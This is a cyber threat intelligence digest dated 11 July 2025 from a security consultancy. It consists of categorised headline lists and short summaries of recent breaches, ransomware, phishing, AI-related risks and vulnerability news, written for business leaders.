Preventing Zero-Click AI Threats: Insights from EchoLeak | Trend Micro (US)
Other Social Engineering
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Fraud, Scams and Financial Crime
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Artificial Intelligence
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks - Infosecurity Magazine
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
AI adoption is booming but secure scaling not so much - Help Net Security
Grok-4 Falls to a Jailbreak Two days After Its Release - SecurityWeek
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
90% of Large Organisations Unprepared for AI-Enabled Threats | Security Magazine
Cyber Security Bosses Fretting About AI Attacks and Misuse
Researcher tricks ChatGPT into revealing security keys - by saying "I give up" | TechRadar
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
From Vibe Coding To Vibe Hacking — AI In A Hoodie
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Malware
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
Hackers hide dangerous Mac trojan in legit apps | Cybernews
WordPress Gravity Forms developer hacked to push backdoored plugins
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
AsyncRAT Spawns a Labyrinth of Forks
North Korean XORIndex malware hidden in 67 malicious npm packages
Threat hunting case study: Lumma infostealer | Intel 471
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Bots/Botnets
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
Mobile
Spyware on Androids Soars - Security Boulevard
Hackers Love These 7 Screenshots You Keep in Your Gallery
Android Malware Konfety evolves with ZIP manipulation and dynamic loading
Don’t Tap That Notification—This Is How Malware Sneaks Onto Smartphones
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Altered Telegram App Steals Chinese Users' Android Data
Denial of Service/DoS/DDoS
DDoS peaks hit new highs: Cloudflare mitigated massive 7.3 Tbps assault
Averted DDoS attacks spike, report finds | SC Media
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Internet of Things – IoT
Your Mercedes or VW could get hacked via Bluetooth | PCWorld
350M Cars, 1B Devices Exposed to 1-Click Bluetooth RCE
Uncovering the Cyber Security Risk in Smart Meter Data Storage | SC Media UK
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Data Breaches/Leaks
'123456' password exposed chats for 64 million McDonald’s job applicants
US Data Breaches Head for Another Record Year After 11% Surge - Infosecurity Magazine
How top military chief’s role in Afghan data leak was hidden
The Afghan data breach has already cost millions. What happens next?
Louis Vuitton says UK customer data stolen in cyber-attack | Cybercrime | The Guardian
Paddy Power and BetFair have suffered a data breach • Graham Cluley
Waltz brushes off SignalGate questions, points finger at CISA | CyberScoop
Data Breach at Debt Settlement Firm Impacts 160,000 People - SecurityWeek
Why hackers love Europe’s hospitals – POLITICO
Over 5.4 Million Affected in Healthcare Data Breach at Episource - Infosecurity Magazine
Anne Arundel Dermatology Data Breach Impacts 1.9 Million People - SecurityWeek
Organised Crime & Criminal Actors
“Telegram has become the new dark web” - 14.07.2025 | BURSA.RO
Abacus dark web drug market goes offline in suspected exit scam
How Criminal Networks Exploit Insider Vulnerabilities
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cyber crime Victim Suicide: Bengaluru Man Dies After Rs 11 Lakh Digital Scam
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Millions in savers’ cash goes missing after crypto company collapses
Hacker steals $27 million in BigONE exchange crypto breach
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Insider Risk and Insider Threats
Most cyber security risk comes from just 10% of employees - Help Net Security
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
How Criminal Networks Exploit Insider Vulnerabilities
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Ex-soldier Googled “can hacking be treason?” pleads guilty • The Register
Insurance
Cyber Insurance Premiums Drop, but Coverage Is Key
Supply Chain and Third Parties
Supplier risk is breaking the size myth in cyber | Insurance Business America
Cloud/SaaS
Hackers Leverage Microsoft Teams to Spread Matanbuchus 3.0 Malware to Targeted Firms
Why your Microsoft 365 setup might be more vulnerable than you think - Help Net Security
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Iran seeks three cloud providers to power its government • The Register
Outages
Cloudflare says 1.1.1.1 outage not caused by attack or BGP hijack
Encryption
How to Start Preparing for a Post-Quantum Future
How CISOs Can Prepare for the Quantum Cyber Security Threat
Safeguarding data in quantum era | Professional Security Magazine
What EU's PQC roadmap means on the ground - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
'123456' password exposed chats for 64 million McDonald’s job applicants
From ‘P@ssw0rd’ to payday: Weak credentials threaten financial systems - Digital Journal
Ranked: The World's Most Common Passwords
98% of passwords can be cracked in seconds, analysis finds | Cybernews
Social Media
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
Training, Education and Awareness
Most cyber security risk comes from just 10% of employees - Help Net Security
Regulations, Fines and Legislation
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
Cyber security of banks - News - Rádio RSI English - STVR
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
What EU's PQC roadmap means on the ground - Help Net Security
UK Online Safety Act 'not up to scratch' on misinformation • The Register
US aims to ban China technology in undersea telecoms cables | The Straits Times
Top US cyber agency CISA shrinks under Trump budget, staff cuts
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Operational risks amid cyber policy uncertainty
Models, Frameworks and Standards
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Data Protection
Buy Now, Pay Later... with your data - Help Net Security
Careers, Working in Cyber and Information Security
Military Veterans May Be What Cyber Security Is Looking For
Why burnout is one of the biggest threats to your security | TechRadar
What Fortune 100s are getting wrong about cyber security hiring - Help Net Security
Cyber Training: Post Challenge, Where Are the Skills Learned? | SC Media UK
Law Enforcement Action and Take Downs
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
French and UK Authorities Arrest Suspects in Ransomware Cases
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
FBI seized multiple piracy sites distributing pirated video games
Misinformation, Disinformation and Propaganda
UK Online Safety Act 'not up to scratch' on misinformation • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Cyber attacks are evolving – so too must government response - New Statesman
What Is A Military Cyber Command And What Does It Do?
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Nation State Actors
Cyber attacks are evolving – so too must government response - New Statesman
Nearly one-third of Irish firms paid a cyber ransom in last year
China
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
China’s cyber sector amplifies Beijing’s hacking of US targets - The Washington Post
What It Takes to Stop the Next Salt Typhoon
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Chinese Hackers Still Trying to Break Into Telecoms Across Globe
Altered Telegram App Steals Chinese Users' Android Data
US National Guard unit was 'extensively' hacked by Salt Typhoon in 2024, memo says | Reuters
Spain awarded €12.3 million in contracts to Huawei
Russia
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Nato unit helping combat Putin's 'hybrid warfare' threat on British soil
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Ukrainian hackers claim IT attack on Russian drone maker • The Register
Iran
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Iran seeks three cloud providers to power its government • The Register
North Korea
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
North Korean XORIndex malware hidden in 67 malicious npm packages
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Tools and Controls
Most cyber security risk comes from just 10% of employees - Help Net Security
AI adoption is booming but secure scaling not so much - Help Net Security
DNS should be your next security priority: Lessons from NIST
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Cyber-Insurance Premiums Drop, but Coverage Is Key
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Hackers hide dangerous Mac trojan in legit apps | Cybernews
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Compliance is evolving — Is your resilience ready? | TechRadar
ISC2 Finds Orgs Are Increasingly Leaning on AI
Making security and development co-owners of DevSecOps - Help Net Security
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Cyber security executives love AI, cyber security analysts distrust it | TechRadar
Things to think about when deploying AI tools in the cyber security space
UK launches vulnerability research program for external experts
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Other News
Hackers swap biometric data to bypass Windows login | Cybernews
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Securing vehicles as they become platforms for code and data - Help Net Security
NCA says 'crude' comparison to FBI efficiency 'not credible' • The Register
Cyber Security Isn’t Just For Experts Anymore: Why You Should Care
Banks urged to beef up cyber security amid more incidents of financial phishing | ABS-CBN News
70% of healthcare cyber attacks result in delayed patient care, report finds – DataBreaches.Net
Understanding replay attacks: A hidden threat in cyber security
Why hackers love Europe’s hospitals – POLITICO
Train Brakes Can Be Hacked Over Radio—And the Industry Knew for 20 Years - SecurityWeek
Vulnerability Management
Brits clinging to Windows 10 face heightened risk, says NCSC | Computer Weekly
NCSC Urges Enterprises to Upgrade to Microsoft Windows 11 to Avoid Cyb - Infosecurity Magazine
Microsoft extends updates for old Exchange and Skype servers • The Register
Don't Want to Upgrade to Windows 11? Microsoft Offers Free Windows 10 Security Updates - CNET
Another WannaCry-size cyber event likely, report warns :: Insurance Day
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Vulnerabilities
Exploits for pre-auth Fortinet FortiWeb RCE flaw released, patch now
CitrixBleed 2 Flaw Poses Unacceptable Risk: CISA - SecurityWeek
Urgent: Google Releases Critical Chrome Update for CVE-2025-6558 Exploit Active in the Wild
Windows KB5064489 emergency update fixes Azure VM launch issues
Fully Patched SonicWall Gear Under Likely Zero-Day Attack
Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part
Chrome fixes 6 security vulnerabilities. Get the update now! | Malwarebytes
Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812) - Help Net Security
Oracle Patches 200 Vulnerabilities With July 2025 CPU - SecurityWeek
Cisco Warns of Critical ISE Flaw Allowing Unauthenticated Attackers to Execute Root Code
VMware Flaws That Earned Hackers $340,000 at Pwn2Own Patched - SecurityWeek
Cisco Discloses '10' Flaw in ISE, ISE-PIC — Patch Now
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Over 600 Laravel Apps Exposed to Remote Code Execution Due to Leaked APP_KEYs on GitHub
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025:
-‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
-Employees Are Quietly Bringing AI to Work and Leaving Security Behind
-Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
-Financial Firms Are Locking the Front Door but Leaving the Back Open
-Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
-Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S CEO Archie Norman Thinks So
-The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
-Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
-The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
-Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
-Why Data Sovereignty Is Not Just a Legal Concern but a Cyber Security Imperative
-Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
-Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
We start this week’s review by looking at the employees in your organisation. A report reveals that two out of five UK office workers would not alert their employer to a suspected cyber attack, mainly for fear of being blamed, while a separate report shows that 90% of employees are entering data into unauthorised AI tools without approval. The consequences of insufficient security through employees and third parties are highlighted by the attack on a supplier of Qantas that resulted in the loss of personal data of up to 6 million customers, and by observations of poor security in the majority of third party suppliers in the financial sector.
In a further update on the attacks on UK retailers including M&S, four suspects of up to 20 years of age have been arrested, while the Chairman of M&S has called for all organisations to be obliged to disclose when they have been attacked. We also report on the real need for organisations to be prepared for how they will respond to cyber security incidents.
We report on the risks of Generative AI, mobile malware, malicious applications imitating trusted names such as Zoom, and attacks on individuals. We also report on how geopolitical tensions are increasing the risks of cyber attacks on organisations, highlighting the need for an objective leadership-driven risk assessment and cyber security strategy.
We know that while many organisations look to their IT team or service provider to manage their cyber security, the attacker instead looks to the employee as one of the easiest ways to break into the systems. Cyber security can only work if it is embraced by an upskilled leadership team that takes command of its risk management and maintenance of controls across people, operations and technology including the organisation’s culture.
Top Cyber Stories of the Last Week
‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
A recent study has revealed that 39% of UK office workers would not report a suspected cyber attack to their employer, largely due to fear of blame or disciplinary action. This silence persists despite relatively high awareness, with 79% of employees confident they could recognise a threat and 43% able to define ransomware. The findings suggest a culture problem, where fear of repercussions discourages openness and transparency. Past incidents show some staff have been punished or even dismissed after cyber attacks, reinforcing this reluctance. Building a blame-free reporting culture and improving cyber security training are critical steps forward.
Employees Are Quietly Bringing AI to Work and Leaving Security Behind
Despite growing efforts by IT departments to implement controls around artificial intelligence (AI), employees are increasingly using unapproved AI tools without oversight. Nearly three quarters of IT leaders have detected such unauthorised use, with over 90% of employees admitting to entering data into these tools without approval. This “shadow AI” poses a significant risk to organisations, particularly around data leakage and loss of visibility. Yet many staff see the benefits as outweighing the risks. The challenge for leadership is to close the gap between employee behaviour and governance, through clear policies, practical training, and integrating approved AI into daily workflows.
https://www.helpnetsecurity.com/2025/07/11/organizations-shadow-ai-risk/
Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
The Qantas data breach has highlighted how human error remains a critical weakness in cyber security. Attackers gained access to personal data for up to 6 million customers by exploiting an offshore IT support provider using social engineering, a method where criminals deceive staff into granting access. This incident follows a series of high-profile breaches across Australia’s healthcare, financial and telecommunications sectors. Experts warn that the growing use of third-party systems and tools like voice-cloning artificial intelligence are increasing the risks. Regulators are urging organisations to improve operational resilience, particularly by strengthening multi-factor authentication and scrutinising third-party cyber security controls.
Financial Firms Are Locking the Front Door but Leaving the Back Open
Financial institutions are improving their own cyber security defences, but many remain vulnerable through third-party suppliers. A recent study found that 92% of vendors serving the financial sector scored poorly in managing sensitive data, and 65% were not keeping systems updated against known risks. While direct cyber attacks on banks and insurers have declined, attackers are increasingly targeting vendors as a way in. These findings highlight that strong internal protections are not enough. Senior leaders should ensure third-party risk is actively monitored, assessed regularly, and addressed through procurement, contracts, and ongoing oversight.
https://www.helpnetsecurity.com/2025/07/11/financial-firms-third-party-cyber-risk/
Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
The UK’s National Crime Agency has arrested four individuals, aged between 17 and 20, in connection with cyber attacks on major UK retailers including M&S, Harrods and Co-op. The suspects were detained on suspicion of offences such as computer misuse, blackmail and money laundering. Electronic evidence was seized and the investigation remains ongoing. The NCA has stressed the importance of businesses working closely with law enforcement when incidents occur, highlighting that early engagement can support more effective responses to serious cyber threats.
https://techinformed.com/teens-arrested-over-cyber-attacks-on-ms/
Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S CEO Archie Norman Thinks So
Marks & Spencer’s Chairman has called for mandatory reporting of serious cyber attacks to the UK’s National Cyber Security Centre, highlighting that major incidents often go unreported. Following a recent attack on the retailer by a group posing as contractors, key systems including contactless payments and click-and-collect were disrupted. While stores stayed open, online clothing orders were only resumed after 46 days. The CEO estimated the cost of the incident at £300 million. The NCSC described the attack as a wake-up call, warning that other organisations remain at risk unless reporting and response practices improve.
https://cybernews.com/security/should-uk-companies-be-required-to-disclose-major-cyberattacks/
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
Many businesses remain vulnerable to disruption due to a lack of formal continuity planning. With growing risks from cyber attacks, supply chain issues, and global instability, resilience is now a strategic necessity, not a back-office function. Despite rapid digital transformation, many organisations have yet to embed risk management into everyday operations, leaving them exposed to operational delays and reputational damage. Continuity today is about endurance, not just recovery. Firms that integrate scenario planning, agile governance, and proactive risk oversight are better placed to absorb shocks, maintain customer trust, and adapt quickly in a volatile market.
Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
Okta has identified that cyber criminals are using generative AI tools like v0.dev to rapidly create convincing phishing websites that mimic legitimate login pages. These sites are often hosted on trusted infrastructure, increasing the risk of users being deceived. The accessibility of AI tools has significantly lowered the skill required to launch such attacks, and open-source guides are further enabling this trend. Okta advises that traditional training alone is no longer sufficient, and organisations should adopt stronger controls such as multi-factor authentication and domain-based protections to defend against these evolving threats.
The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
The rapid growth in smartphone use, expected to reach 7.2 billion users by 2025, has created an expanding target for cyber criminals. Mobile malware is rising sharply, with over 12 million attacks blocked in the first half of 2025 alone. The most common threats include trojans, spyware, adware, and ransomware, often disguised as legitimate apps or delivered via phishing messages. Official app stores are not immune, with some malicious apps reaching over 60 million downloads. Senior leaders should ensure mobile security policies are enforced across their organisations, including app vetting, operating system updates, and user awareness to reduce risk exposure.
https://cybernews.com/security/the-rising-threat-of-mobile-malware/
Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
Kaspersky has reported that nearly 8,500 small and medium-sized businesses have faced cyber attacks in 2025 through fake downloads of widely used tools like Zoom, Microsoft Office, and newer AI platforms such as ChatGPT and DeepSeek. Attackers are increasingly disguising malicious software as popular apps, exploiting the rise in remote work and interest in artificial intelligence. Notably, files mimicking Zoom alone accounted for 41 percent of all cases observed. These threats often aim to steal login credentials or deliver malware through phishing emails and fake websites. Kaspersky advises SMBs to adopt robust cyber security practices, including verified software downloads, clear usage policies, and regular data backups.
https://www.dawn.com/news/1921871
Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
UK MPs have warned that hostile states are increasingly using “grey zone” tactics such as cyber attacks, disinformation, sabotage and espionage to destabilise the UK without triggering formal conflict. A parliamentary report calls for a “whole of society” response, involving schools, businesses and communities alongside government. The Defence Committee stressed that these threats affect everyday life and target national infrastructure and digital systems. To address this, MPs are urging greater investment in cyber skills, public awareness, and infrastructure protection, as well as a new homeland security minister to coordinate efforts across sectors and strengthen national resilience.
https://uk.news.yahoo.com/whole-society-must-respond-threats-230100347.html
Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Geopolitical tensions are driving a marked increase in cyber attacks from state-backed groups, terrorists, and politically motivated actors. A recent GlobalData report warns that organisations, particularly those involved in critical national infrastructure, are facing heightened risks from espionage and disruption campaigns. Nearly 60% of businesses now shape their cyber security response around geopolitical developments. Complex global supply chains further compound this risk, with suppliers often lacking robust cyber defences. Supply chain attacks are becoming more frequent and harder to contain, taking over 300 days on average to identify and resolve, significantly longer than other types of data breaches.
https://www.verdict.co.uk/businesses-at-greater-risk-of-cyberattack-due-to-geopolitical-tensions/
Governance, Risk and Compliance
Many workers wouldn't tell their bosses if they'd been hit by a cyber attack | TechRadar
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
Comms Business - MSPs relied on more than ever for cyber security, finds report
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Technology outpaces security adaptation, says Bitdefender
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Many companies are still failing to budget for cyber security | TechRadar
Cyber insurance confronts the age of intelligent threats | Insurance Business America
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Attacks Spike Despite Gang Closure - IT Security Guru
‘No honour among thieves’: M&S hacking group starts turf war
Should UK companies be required to disclose major cyber attacks? | Cybernews
Ransomware Groups Multiply as Attack Surface Rapidly Expands, GuidePoint Security Finds
Hunters International Ransomware Is Not Shutting Down, It’s Rebranding - Infosecurity Magazine
Iranian ransomware crew promises big bucks for US attacks • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
AiLock ransomware: What you need to know | Fortra
Unmasking the SafePay Ransomware Group - Infosecurity Magazine
SafePay Ransomware Surge Tends to Target Key Sectors
Short-lived ransomware group SatanLock to close down and leak data - BetaNews
New Bert Ransomware Group Strikes Globally with Multiple Variants - Infosecurity Magazine
Ransomware Victims
M&S shares sink lower after failing to recover from cyber attack
Cyber attack on M&S involved 'sophisticated impersonation', chairman says | Money News | Sky News
Should UK companies be required to disclose major cyber attacks? | Cybernews
Qantas data breach shows compliance doesn’t always mean protection and resilience | The Strategist
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
UK companies should have to disclose major cyber attacks, M&S says | Reuters
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Venture capital giant IdeaLab confirms breach, says private data was stolen in attack | TechRadar
Suspected Scattered Spider domains target multiple sectors • The Register
Over 500 Scattered Spider Phishing Domains Poised to Target Multiple I - Infosecurity Magazine
How M&S responds to its cyber-attack could have a serious impact on its future – and its customers
M&S chair refuses to discuss paying off cyber attackers | The Grocer
Hacker leaks Telefónica data allegedly stolen in a new breach
Qantas is being extorted in recent data-theft cyber attack
Ingram Micro Suffers Huge Ransomware Attack
IT Giant Ingram Micro Reveals Ransomware Breach - Infosecurity Magazine
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
How cyber insurers are stepping up after M&S attack - Insurance Post
Qantas confirms data breach impacts 5.7 million customers
Ingram Micro Up and Running After Ransomware Attack
Customer, Employee Data Exposed in Nippon Steel Breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Phishing & Email Based Attacks
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
New Phishing Attack Impersonates DWP to Steal Credit Card Data
Cyber crooks jump on .es domain for credential phishing trip • The Register
Phishing Scams Can Deceive Large Language Models | Security Magazine
Identity attacks surge 156% as phishermen get craftier • The Register
Experts flag a huge amount of cyber attacks coming from this unexpected domain | TechRadar
A Clever Russian Phishing Attack Using Fake State Department Employees
Human rights body hooked by phishing scam - Newsroom
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
M&S boss says two big UK firms hit by unreported cyber-attacks | Retail industry | The Guardian
M&S turned to FBI for help after ‘traumatic’ cyber attack
Browser Exploits Wane as Users Become the Attack Surface
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S.
Fraud, Scams and Financial Crime
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
Hundreds of Malicious Domains Registered Ahead of Prime Day - Infosecurity Magazine
BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally
SIM Swap Fraud Is Surging — and That's a Good Thing
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
New Phishing Attack Impersonates DWP to Steal Credit Card Data
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Visa's 24/7 war room takes on global cyber criminals
Human rights body hooked by phishing scam - Newsroom
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Artificial Intelligence
Experts warn this top GenAI tool is being used to build phishing websites | TechRadar
Employees are quietly bringing AI to work and leaving security behind - Help Net Security
Phishing Scams Can Deceive Large Language Models | Security Magazine
The Wild West of Agentic AI - An Attack Surface CISOs Can’t Afford to Ignore - SecurityWeek
Security practices must evolve to battle growing deepfake sophistication - SiliconANGLE
AI Security Institute targets cyber crime in hiring push - UKTN
The four-phase security approach to keep in mind for your AI transformation | TechRadar
It’s time to give AI security its own playbook and the people to run it - Help Net Security
Leveraging cyber security to establish trade secret protection in the age of AI - IAM
What Can Businesses Do About Ethical Dilemmas Posed by AI? - SecurityWeek
What Security Leaders Need to Know About AI Governance for SaaS
What CISOs Need to Know About AI Governance Frameworks | TechTarget
AI Accelerates Security Risks in Broken Data Environments
AI built it, but can you trust it? - Help Net Security
SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Google Cloud keeps AI data in UK, but not the support • The Register
2FA/MFA
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Malware
SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Weaponized Versions of PuTTY and WinSCP Attacking IT Admins Via Search Results
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Atomic macOS infostealer adds backdoor for persistent attacks
Chrome Store Features Extension Poisoned With Sophisticated Spyware
